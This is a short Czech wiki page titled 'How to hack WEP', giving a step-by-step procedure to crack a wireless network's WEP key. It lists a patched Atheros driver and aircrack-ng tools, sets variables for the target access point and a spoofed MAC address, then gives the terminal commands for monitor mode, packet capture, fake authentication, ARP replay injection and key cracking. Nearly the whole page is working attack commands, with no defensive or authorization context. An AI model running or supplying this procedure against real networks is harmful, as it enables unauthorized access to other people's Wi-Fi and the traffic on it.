===== Jak hacknout WEP ===== ==== Vstupni predpoklady ==== * pocitac s linuxem * wifi karta s chipsetem Atheros a Madwifi drivery s [[http://patches.aircrack-ng.org/madwifi-ng-r2277.patch|patchem]] umoznujicim packet injection * [[http://www.aircrack-ng.org/doku.php#download|aircrack-ng]] * [[http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw/download/aircrack-ptw-1.0.0.tar.gz|aircrack-ptw]] ==== Konvence ==== * MAC adresa vzdaleneho AP bude vzdy oznacena jako $APMAC * mistni MAC adresa bude oznacena jako $MYMAC, nemusi se shodovat se skutecnou MAC adresou * kanal je oznacen $CHANNEL * ESSID je $ESSID export APMAC="00:12:0E:XX:XX:XX" export MYMAC="00:02:2D:XX:XX:XX" export CHANNEL="7" export ESSID="doma" ==== Postup ==== Terminal 0 /usr/local/bin/wlanconfig ath0 destroy /usr/local/bin/wlanconfig ath0 create wlandev wifi0 wlanmode monitor airodump-ng ath0 airodump-ng --bssid $APMAC --channel $CHANNEL --write doma ath0 Terminal 1 aireplay-ng -a $APMAC -h $MYMAC -e "$ESSID" --fakeauth 0 ath0 Terminal 2 aireplay-ng --arpreplay -b $APMAC -h $MYMAC ath0 Terminal 3 aircrack-ptw $ESSID-01.cap